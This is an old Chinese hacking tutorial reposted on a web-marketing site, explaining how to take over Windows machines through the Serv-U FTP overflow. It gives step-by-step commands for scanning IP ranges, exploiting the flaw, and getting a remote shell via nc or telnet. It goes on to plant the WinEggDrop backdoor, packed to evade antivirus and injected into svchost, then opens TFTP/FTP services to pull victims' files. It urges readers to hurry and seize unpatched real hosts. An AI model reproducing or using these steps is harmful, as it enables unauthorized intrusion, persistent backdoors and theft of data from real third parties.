让企业赢在全网营销时代
当前位置: 首页>>建站知识>>网站运营

erv-u溢出是怎么回事--网站被攻击手段之一

作者:admin 点击量:296次 2016-11-22 02:15:02

 

电脑成为肉鸡,黑客用的手段很多,其中SERV-U溢出就是其中一,现在一般这方法成功率没有以前的高了,之前的serv-u溢出真的是成功率100%。而且不知道有多少的机子被当成了肉机。 估计现在还有这类肉机。心情比较好。所以写了这篇文件。让大家学会如何去找一 台肉机练手。文章有破坏性。请不要破坏肉机上的东西。只做教学用。本教程只适合初级练手用。。高一级别的就不用看了。免得让人笑话。。 
erv-u溢出是怎么回事--网站被攻击手段之一
1,大家都知道WinEggDrop Shell后门是很强大的后门。有一点懂的人都知道它。 
下面我将演示如何配置它。适合初学者。 
查看wineggdrop shell后门所包含的工具。。有injectt.exe editserver.exe tback.dll 
等三个文件。 
配置wineggdrop shell后门服务。要同时打开injectt.exe editserver.exe 服务..出现press any key to start 然回车。 
然后进入中文与英文配置选择。我们选择中文。。所以按1键。 
然后进入配置菜单。我只演示端口设置和注入dll名字的设置。密码和其他的设置自已可以慢慢设。。别忘了把密码记住。 
设置服务程序的端口。。最好是哪些让人糊里糊涂的端口。比如75等。。设置好后按回车 
设置注入dll文件名。这一点很关键。。一定要用svchost.exe这个关键进程。设置好后按回车 
回到主菜单。。把他全设置好后。按a保存。然后按q离开。如果要看设置好的项目按b.要修改。直接让要修改的项。然后按a保存。 
接下来。我们要压缩wineggdrop shell。。用aspack压缩injectt.exe 和 tback.dll两个文件。压缩只是为了跳避防火和查毒。。现在压缩的工具很多。用upx也行。如果要找这些工具。记得去看雪学院。。别告诉我。你不知道看雪。。。):: 
接下来我们要找肉机了。别急。我们先打开ftpscan工具。然后查看他的使用方法。 
ftpscan startip endip port thredas file 别告诉我这些不明白。哪我告诉你吧。startip。开始ip endip。结束ip...port 就是21端口了,因为我们要用serv-u溢出找肉机。 thredas 就是线程。工具有详细说明最好用1024线程。file 就是你要保存文件名。如下图就明白了。 
记住要同段网络。不要用不同段网络扫。哪样是不行的。如下图。。溢出的ip终于出现了。。哈哈。。 
我们试试serv-u溢出工具的用法。。su ip port user pass 
ip就是刚才用ftpscan扫出来溢出的i。port就是21端口了。。user pass就是刚才扫出来的用户和密码。 
成功的标志如下图。就是成功了。哈哈。成功后要你用nc和telnet连接上8111端口。。最好用nc。如果没有。就用 win自带的telnet了。 
已成功进入。得到了肉机的cmd shell了。。如下图演示。。 
并进入了肉机的c盘了。。。哈哈。。。高兴不。。 
接下来我们要传文件到肉机上..先在自已的机子里开启tftpd32.exe工具。。如下图所示。。最好把tftpd32.exe启动在你有工具的哪个目录。哪样就很方便地传文件到肉机上了。。 
 
我们得到肉机的cmd shell了。现在我们传文件上去。。我们传刚才的木马。。要在winnt/system32这个目录下。如下图。(下图是在c盘)。你可以进入winnt/system32目录下再传文件。。命令如下tftp -i ip get(上传) 文件名。 例如肉机自已的电脑ip是218.0.0.1 传的文件是injectt.exe 就tftp -i 218.0.0.1 get injectt.exe 就ok了。。如果出现timeout等信息。证明有防火。用net start查看一下。当然。我有私人工具。根本不用怕防火。这工具。我就不能告诉你们了。。 
传完后。直接运行。injectt.exe远行。。。要把injectt.exe和tback.dll这两个文件传上去。。injectt.exe运行成功。 
运行成功后。在本机打开dos窗口。。有nc的话就用nc ip port连上去。。例如肉机ip是127.0.0.1 然后就nc 127.0.0.1 port 。这个port就是你设置木马时所设置的端口。。也可以用telnet ip port连接。。连接成功后。要输入验证密码。。就是你设置木马时设的密码。我要你记住的。你记住了没有。 
连接上肉机后。就会出现如下图所示。。然后输入help。就可以看到木马所有的命令。。及命令的功能。。像克隆帐号啊。开启终端啊。及清除日志啊。。很多很多。。自已对着工具帮助慢慢看。。 
输入cmd的就进入肉机的cmdshell。。我们就进入了肉机的c:winntsystem32目录下了。我们要传文件到这个目录。。 
接下来我们要做tftpd服务。在肉机上做。一直就有些人搞上肉机后就开3389端口。。我认为是很不好的。。毕竟3389被人开启了。是管理员的话。一看就会知道了。所以我还是喜欢开tftp和ftp服务。。首先我们进入system32目录下的dllcache目录。。(这里指的win2k)然后用dir tftpd.exe /s查看有没有tftpd.exe这个文件。如果是c:winnt%systemroot%这个目录了。如果还没有。哪自已传一下上去吧。。然后把他copy到system32目录下。也可以copy到你想做ftp的一个目录下。。可以是任何盘。这里我们是copy到system32目录下。。 
接下来。我们要传给肉机一个创建服务的工具。就是常用的instrv.exe工具。用来创建tftpd.exe服务。 
传成功后。我们用instsrv.exe 创建tftp服务。。你可以先查看一下instsrv.exe的命令。。下图就是演示如何创建tftp服务的命令。 
创建成功后。我们就要用net start tftp 启动服务了。。 
启动成功后。我们在本机上试试是不是成功了。。打开dos窗口..然后tftp -i 肉机ip get 文件名。。 从肉机上拿文件到本机上。。显示成功。。就代表肉机已经是tftp服务器了。。。

接下来我们用另外一种方法做ftp服务器。就是用20cn哪里写的一个工具。。ftpserver.exe。。这个工具就是用来在肉机上创建ftp服务的。。我们选用tftp把ftpserver.exe传到肉机上。。并直接运行。。 
运行成功后。就可以用netstat -an是不是开启了服务的端口。。20cn的哪个ftpserver.exe采用的是521端口。自已在20cn哪里下过来自已配 
置。。 
接下来我们就要用leapftp连接上肉机了。。真高兴。。leapftp我想大家都用过。哈哈。在ftp服务器里输入肉机的ip。。用户名就是你想要的盘符。如果想看c盘就输入c。如果想看d盘就输入d.以此类推。。端口是521端口。。连接成功后。刷新就可以看到整个c盘了。高兴吧。哈哈。。哈哈。。不用上3389一样可以看肉机的所有东西。哈哈。下载更方便。。你看了肉机的哪个文件。把他全给拉下来。哈哈。真好。。。 
 
我的简单教程终于写完了。我想大家从我的这个教程里一定能找到几个肉机练手的。因为现在还存在着一部的管理员没有把serv-u这个溢出漏洞给打上补丁。所以要肉机练手。请尽快抓紧时间吧。一直没有时间写。。今天终于空闲了。所以把这篇文章送给小榕这里的朋友。不知道还有没有人记得我无产阶级。。曾经最爱注水的。此文章只适合初级练手用的。。。